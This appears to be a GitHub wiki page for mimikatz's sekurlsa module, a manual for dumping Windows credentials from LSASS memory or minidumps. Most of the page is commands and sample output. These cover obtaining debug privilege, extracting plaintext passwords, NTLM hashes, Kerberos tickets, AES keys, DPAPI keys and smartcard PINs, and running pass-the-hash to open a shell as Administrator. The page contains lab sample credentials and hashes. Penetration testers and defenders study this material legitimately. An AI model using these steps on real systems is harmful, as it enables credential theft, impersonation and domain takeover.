-
Notifications
You must be signed in to change notification settings - Fork 3.8k
module ~ sekurlsa
This module extracts passwords, keys, pin codes, tickets from the memory of lsass
(Local Security Authority Subsystem Service
)
the process by default, or a minidump of it! (see: howto ~ get passwords by memory dump for minidump or other dumps instructions)
When working with lsass
process, mimikatz
needs some rights, choice:
- Administrator, to get
debug
privilege viaprivilege::debug
-
SYSTEM
account, via post exploitation tools, scheduled tasks,psexec -s ...
- in this casedebug
privilege is not needed.
Without rights to access lsass
process, all commands will fail with an error like this: ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
(except when working with a minidump).
So, do not hesitate to start with:
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # log sekurlsa.log
Using 'sekurlsa.log' for logfile : OK
...before others commands 😉
The information that can be extracted depends on the version of Windows and authentication methods: [en] http://1drv.ms/1fCWkhu
Starting with Windows 8.x and 10, by default, there is no password in memory.
Exceptions:
- When DC is/are unreachable, the
kerberos
provider keeps passwords for future negocation ; - When
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
,UseLogonCredential
(DWORD) is set to1
, thewdigest
provider keeps passwords ; - When values in
Allow*
inHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Credssp\PolicyDefaults
orHKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation
, thetspkgs
/ CredSSP provider keeps passwords.
Of course, not when using Credential Guard.
Commands: logonpasswords, pth, tickets, ekeys, dpapi, minidump, process, searchpasswords, msv, wdigest, kerberos, tspkg, livessp, ssp, credman
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 88038 (00000000:000157e6)
Session : Interactive from 1
User Name : Gentil Kiwi
Domain : vm-w7-ult
SID : S-1-5-21-2044528444-627255920-3055224092-1000
msv :
[00000003] Primary
* Username : Gentil Kiwi
* Domain : vm-w7-ult
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
tspkg :
* Username : Gentil Kiwi
* Domain : vm-w7-ult
* Password : waza1234/
wdigest :
* Username : Gentil Kiwi
* Domain : vm-w7-ult
* Password : waza1234/
kerberos :
* Username : Gentil Kiwi
* Domain : vm-w7-ult
* Password : waza1234/
ssp :
[00000000]
* Username : admin
* Domain : nas
* Password : anotherpassword
credman :
[00000000]
* Username : nas\admin
* Domain : nas.chocolate.local
* Password : anotherpassword
Pass-The-Hash
mimikatz
can perform the well-known operation 'Pass-The-Hash' to run a process under another credentials with NTLM
hash of the user's password, instead of its real password.
For this, it starts a process with a fake identity, then replaces fake information (NTLM
hash of the fake password) with real information (NTLM
hash of the real password).
Arguments:
-
/user
- the username you want to impersonate, keep in mind that Administrator is not the only name for this well-known account. -
/domain
- the fully qualified domain name - without domain or in case of local user/admin, use computer or server name,workgroup
or whatever. -
/rc4
or/ntlm
- optional - the RC4 key / NTLM hash of the user's password. -
/aes128
- optional - the AES128 key derived from the user's password and the realm of the domain. -
/aes256
- optional - the AES256 key derived from the user's password and the realm of the domain. -
/run
- optional - the command line to run - default is:cmd
to have a shell.
mimikatz # sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
user : Administrateur
domain : chocolate.local
program : cmd.exe
NTLM : cc36cf7a8514893efccd332446158b1a
| PID 712
| TID 300
| LUID 0 ; 362544 (00000000:00058830)
\_ msv1_0 - data copy @ 000F8AF4 : OK !
\_ kerberos - data copy @ 000E23B8
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ des_cbc_md5 -> null
\_ des_cbc_crc -> null
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace -> null
Also valid on Windows recent versions:
sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
Remarks:
- this command does not work with minidumps (nonsense);
- it requires elevated privileges (
privilege::debug
orSYSTEM
account), unlike 'Pass-The-Ticket' which uses one official API ; - this new version of 'Pass-The-Hash' replaces
RC4 keys
of Kerberos by thentlm
hash (and/or replacesAES
keys) - it permits to the Kerberos provider to askTGT
tickets! ; -
ntlm
hash is mandatory on XP/2003/Vista/2008 and before 7/2008r2/8/2012kb2871997
(AES
not available or replaceable) ; -
AES
keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 withkb2871997
, in this case you can avoidntlm
hash.
See also:
- Pass-The-Ticket: kerberos::ptt
- Golden Ticket: kerberos::golden
List and export Kerberos tickets of all sessions.
Unlike kerberos::list, sekurlsa
uses memory reading and is not subject to key export restrictions. sekurlsa
can access tickets of others sessions (users).
Argument:
-
/export
- optional - tickets are exported in.kirbi
files. They start with user'sLUID
and group number (0
=TGS
,1
=client ticket
(?) and2
=TGT
)
mimikatz # sekurlsa::tickets /export
Authentication Id : 0 ; 541043 (00000000:00084173)
Session : Interactive from 2
User Name : Administrateur
Domain : CHOCOLATE
SID : S-1-5-21-130452501-2365100805-3685010670-500
* Username : Administrateur
* Domain : CHOCOLATE.LOCAL
* Password : (null)
Group 0 - Ticket Granting Service
[00000000]
Start/End/MaxRenew: 11/05/2014 16:47:59 ; 12/05/2014 02:47:58 ; 18/05/2014 16:47:58
Service Name (02) : ldap ; srvcharly.chocolate.local ; @ CHOCOLATE.LOCAL
Target Name (02) : ldap ; srvcharly.chocolate.local ; @ CHOCOLATE.LOCAL
Client Name (01) : Administrateur ; @ CHOCOLATE.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
d0195b657e63cdec73f32bf44d36bb12a62c928de6db9964b5a87c55721f8d04
Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...]
* Saved to file [0;84173]-0-0-40a50000-Administrateur@ldap-srvcharly.chocolate.local.kirbi !
[00000001]
Start/End/MaxRenew: 11/05/2014 16:47:59 ; 12/05/2014 02:47:58 ; 18/05/2014 16:47:58
Service Name (02) : LDAP ; srvcharly.chocolate.local ; chocolate.local ; @ CHOCOLATE.LOCAL
Target Name (02) : LDAP ; srvcharly.chocolate.local ; chocolate.local ; @ CHOCOLATE.LOCAL
Client Name (01) : Administrateur ; @ CHOCOLATE.LOCAL ( CHOCOLATE.LOCAL )
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
60cedabb5c3e2874131e9770c2d858fdec0342acf8c8787771d7c4475ace0392
Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...]
* Saved to file [0;84173]-0-1-40a50000-Administrateur@LDAP-srvcharly.chocolate.local.kirbi !
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 11/05/2014 16:47:58 ; 12/05/2014 02:47:58 ; 18/05/2014 16:47:58
Service Name (02) : krbtgt ; CHOCOLATE.LOCAL ; @ CHOCOLATE.LOCAL
Target Name (02) : krbtgt ; CHOCOLATE.LOCAL ; @ CHOCOLATE.LOCAL
Client Name (01) : Administrateur ; @ CHOCOLATE.LOCAL ( CHOCOLATE.LOCAL )
Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
4b42cce01deffbfb0e67efc18c993bb52601848763aecf322030329cd1882e4c
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;84173][email protected] !
See also:
- Pass-The-Ticket: kerberos::ptt
- Golden Ticket: kerberos::golden
mimikatz # sekurlsa::ekeys
Authentication Id : 0 ; 541043 (00000000:00084173)
Session : Interactive from 2
User Name : Administrateur
Domain : CHOCOLATE
SID : S-1-5-21-130452501-2365100805-3685010670-500
* Username : Administrateur
* Domain : CHOCOLATE.LOCAL
* Password : (null)
* Key List :
aes256_hmac b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
rc4_hmac_nt cc36cf7a8514893efccd332446158b1a
rc4_hmac_old cc36cf7a8514893efccd332446158b1a
rc4_md4 cc36cf7a8514893efccd332446158b1a
rc4_hmac_nt_exp cc36cf7a8514893efccd332446158b1a
rc4_hmac_old_exp cc36cf7a8514893efccd332446158b1a
mimikatz # sekurlsa::dpapi
Authentication Id : 0 ; 251812 (00000000:0003d7a4)
Session : Interactive from 1
User Name : Administrateur
Domain : CHOCOLATE
SID : S-1-5-21-130452501-2365100805-3685010670-500
[00000000]
* GUID : {62f69fd3-0a99-4531-bf94-7442fdf1e411}
* Time : 01/05/2014 13:12:39
* Key : 8801bde168af739ab81aa32b79aa0ee4c27cb9c0dc94b6ab0a8516e650b4bdd565110ae1040d3e47add422454d92b307276bebdba7b23b2b2f8005066ede3580
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'
mimikatz # sekurlsa::logonpasswords
Opening : 'lsass.dmp' file for minidump...
Authentication Id : 0 ; 88038 (00000000:000157e6)
Session : Interactive from 1
User Name : Gentil Kiwi
Domain : vm-w7-ult
SID : S-1-5-21-2044528444-627255920-3055224092-1000
msv :
[00000003] Primary
* Username : Gentil Kiwi
* Domain : vm-w7-ult
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
...
Remark:
Dump from | Works on |
---|---|
NT 5 - x86 | NT 5 - x86 |
NT 5 - x64 | NT 5 - x64 |
NT 6 - x86 | NT 6 - x86/x64 (mimikatz x86 )
|
NT 6 - x64 | NT 6 - x64 |
Some errors:
-
ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->MajorVersion (A) != MIMIKATZ_NT_MAJOR_VERSION (B)
You try to open minidump from a Windows NT of another major version (NT5 vs NT6). -
ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->ProcessorArchitecture (A) != PROCESSOR_ARCHITECTURE_xxx (B)
You try to open minidump from a Windows NT of another architecture (x86 vs x64). -
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000002)
The minidump file is not found (check path).
Authentication Id : 0 ; 3518063 (00000000:0035ae6f)
Session : Unlock from 1
User Name : Administrateur
Domain : CHOCOLATE
SID : S-1-5-21-130452501-2365100805-3685010670-500
msv :
[00010000] CredentialKeys
* RootKey : 2a099891174e2d700d44368255a53a1a0e360471343c1ad580d57989bba09a14
* DPAPI : 43d7b788389b67ee3bcac1786f01a75f
Authentication Id : 0 ; 3463053 (00000000:0034d78d)
Session : Interactive from 2
User Name : utilisateur
Domain : CHOCOLATE
SID : S-1-5-21-130452501-2365100805-3685010670-1107
msv :
[00010000] CredentialKeys
* NTLM : 8e3a18d453ec2450c321003772d678d5
* SHA1 : 90bbad2741ee9c533eb8eb37f8fb4172b8896ffa
[00000003] Primary
* Username : utilisateur
* Domain : CHOCOLATE
* LM : 00000000000000000000000000000000
* NTLM : 8e3a18d453ec2450c321003772d678d5
* SHA1 : 90bbad2741ee9c533eb8eb37f8fb4172b8896ffa
When using smartcard logon on the domain, lsass
caches PIN code of the smartcard
mimikatz # sekurlsa::kerberos
[...]
kerberos :
* Username : Administrateur
* Domain : CHOCOLATE.LOCAL
* Password : (null)
* PIN code : 1234